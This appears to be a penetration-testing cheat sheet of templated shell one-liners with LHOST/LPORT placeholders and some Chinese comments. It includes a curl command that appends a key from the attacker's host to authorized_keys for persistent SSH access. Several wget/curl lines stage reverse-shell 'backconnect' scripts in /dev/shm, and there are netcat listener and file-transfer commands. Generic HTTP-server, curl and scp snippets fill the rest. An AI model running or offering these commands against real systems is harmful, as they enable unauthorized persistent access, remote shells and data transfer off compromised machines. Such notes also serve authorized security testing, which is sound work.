# Add public key to authorized keys
# desc: Add SSH
curl https://#{LHOST}:#{LPORT}/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

# desc: Download in RAM
wget #{LHOST}:#{LPORT}/#{file} -O /dev/shm/.rev.py
wget #{LHOST}:#{LPORT}/#{file} -P /dev/shm
curl #{LHOST}:#{LPORT}/#{file} -o /dev/shm/shell.py
@file.desc(backconnect file)

# desc: HTTP servers
python -m SimpleHTTPServer #{LPORT}

# desc: HTTP servers
python3 -m http.server #{LPORT}

# desc: HTTP servers
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => #{LPORT}, :DocumentRoot => Dir.pwd).start"

# desc: HTTP servers
php -S $ip:#{LPORT}

# desc: NC TCP Listening
nc -nvlp #{LPORT}

# desc: Curl POST
# json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' #{URL}

# desc: Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' #{URL}

# desc: Secure Copy to Remote
# refer: https://wangdoc.com/ssh/scp.html
scp #{source_file} #{USER}@#{RHOST}:#{remote_path}

--- 使用nc传输文件

# 使用nc上传文件
# desc: 监听并上传
nc -nvlp #{LPORT} < #{file}

# 对端下载文件
# desc: 对端连接并下载文件
nc #{LHOST} #{LPORT} > #{file}
@LHOST.desc(本端的地址)
@LPORT.desc(本端的端口)